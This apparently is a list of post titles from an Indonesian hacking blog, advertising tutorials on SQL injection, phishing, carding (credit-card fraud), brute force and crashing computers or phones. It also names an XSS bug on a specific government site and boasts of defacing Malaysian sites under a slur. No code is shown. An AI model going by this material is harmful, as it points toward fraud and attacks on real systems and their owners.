I'm Surrender!!! SQLi Tutorial banyak banget menurut mpu Marezzi!!! (AKU MENYERAAAHHH!!!)

Bagi orang yang gak bangga sama Hacker yang ngehack situs-situs pas HUT RI, baca ini!

Stupid Phising Revolution

Stupid PhisingRevolution

Free Domain Box Hacking!

SQL Injection Reloaded 2

SQL Injection Reloaded

Freeze Access Point aka AP

Ngerjain Satpam dengan mengakali Radio

C++ Untuk membuat Calculator Sederhana

The Hacker Versi HUT Malingsial

Remote Killing Revolution (Cara ke 2, Pencegahan, dan Finishing)

BSOD Reloaded! (HTML Edition)

Membuat Crash Komputer dengan JavaScript

YES!!! Situs Malingsial is GAME OVER!!!

Merestart HP Orang pake Bluetooth

HORE! Bisa Upload Code!!!

Brute Force

Tutorial Carding Reloaded

Forum Bing-bing Coder

Manifesto Seorang Hacker International

Tutorial Carding

Bug XSS pada budpar.go.id

FAQ Reloaded

SiBN (Service is Bring Nothing)

Stupid Phising
Revolution